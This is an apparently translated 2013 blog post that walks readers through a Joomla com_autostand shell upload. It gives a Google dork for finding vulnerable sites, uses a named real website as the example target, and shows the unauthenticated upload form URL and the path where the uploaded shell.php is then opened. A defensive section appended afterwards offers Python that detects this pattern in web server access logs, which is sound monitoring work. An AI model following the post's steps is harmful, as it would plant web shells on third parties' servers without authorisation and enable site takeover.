Wednesday, February 6, 2013

Joomla Component com_autostand shell upload Vulnerability

Here is another kind of Joomla hacking. This one is done by uploading through the file uploader.
Dork : "inurl:com_autostand"
As an example, I will use the site below.
http://www.maxoverdrive.ca/index.php?option=com_autostand&Itemid=27&func=viewcategory&id=0
Let's say that is the one. There, delete everything that comes after http://www.maxoverdrive.ca/ and replace it with
/index.php?option=com_autostand&func=newItem
Once that is done, the page will look like the picture below.

http://www.maxoverdrive.ca//index.php?option=com_autostand&func=newItem
Wow. I don't know whether you can see it, but the page offers several fields for uploading files.
Now you can upload your own shell file.
The shell files you upload have to be viewed afterwards at
localhost/path/images/autostand/images/shell.php

http://www.maxoverdrive.ca/images/autostand/images/shell.php 

That is how you go back and view it. I will add a few more links below for testing.
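From the defender's side, the sequence in this post leaves a recognizable trail in web server access logs: a request for `func=newItem` on `com_autostand`, then a request for a script under `images/autostand/images/`. The following is an added example, not part of the original post; the combined-style log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (combined-style format), not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Feb/2013:10:00:01 +0000] "GET /index.php?option=com_autostand&Itemid=27&func=viewcategory&id=0 HTTP/1.1" 200 5120
203.0.113.5 - - [06/Feb/2013:10:00:09 +0000] "GET //index.php?option=com_autostand&func=newItem HTTP/1.1" 200 4310
203.0.113.5 - - [06/Feb/2013:10:00:31 +0000] "POST /index.php?option=com_autostand&func=newItem HTTP/1.1" 200 812
203.0.113.5 - - [06/Feb/2013:10:00:40 +0000] "GET /images/autostand/images/shell.php HTTP/1.1" 200 977
198.51.100.7 - - [06/Feb/2013:10:02:00 +0000] "GET /images/autostand/images/car1.jpg HTTP/1.1" 200 20480
"""
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_DIR = "/images/autostand/images/"  # upload location named in the post
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

def classify(method, target):
    """Return a finding label for one request, or None if it is unremarkable."""
    path, _, qs = target.partition("?")
    path = re.sub(r"/{2,}", "/", path)  # tolerate the doubled slash seen in the post's URL
    query = {k.lower(): [v.lower() for v in vs] for k, vs in parse_qs(qs).items()}
    if "com_autostand" in query.get("option", []) and "newitem" in query.get("func", []):
        return "newitem-submit" if method == "POST" else "newitem-form"
    if path.lower().startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
        return "script-in-upload-dir"  # an image directory should never serve scripts
    return None

def scan(log_text):
    """Return (client_ip, label, status, target) for each suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, method, target, status = m.groups()
            label = classify(method, target)
            if label:
                findings.append((ip, label, int(status), target))
    return findings

def likely_compromise(findings):
    """Clients that submitted the newItem form and later got a 200 for a script in the upload dir."""
    submitted, hits = set(), []
    for ip, label, status, target in findings:
        if label == "newitem-submit":
            submitted.add(ip)
        elif label == "script-in-upload-dir" and status == 200 and ip in submitted:
            hits.append((ip, target))
    return hits

if __name__ == "__main__":
    print(likely_compromise(scan(SAMPLE_LOG)))
```

A `script-in-upload-dir` finding with status 200 is worth investigating on its own, since it means the server executed or served a script from a directory meant for images.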
